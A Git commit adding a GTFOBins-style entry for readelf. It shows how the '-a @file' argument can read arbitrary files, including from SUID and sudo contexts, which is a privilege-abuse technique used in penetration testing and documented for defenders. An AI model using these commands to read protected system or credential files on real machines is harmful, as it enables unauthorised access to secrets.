Create readelf.md

This commit is contained in:
0rbz 2018-12-31 14:58:24 -05:00 committed by GitHub
parent 9652aee337
commit 6ebfcef36c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

18
_gtfobins/readelf.md Normal file
View File

@ -0,0 +1,18 @@
---
description: |
Each line is corrupted by a prefix string and wrapped inside single quotes.
functions:
file-read:
- code: |
LFILE=file_to_read
readelf -a @$LFILE
suid:
- code: |
LFILE=file_to_read
readelf -a @$LFILE
sudo:
- code: |
LFILE=file_to_read
sudo readelf -a @$LFILE
---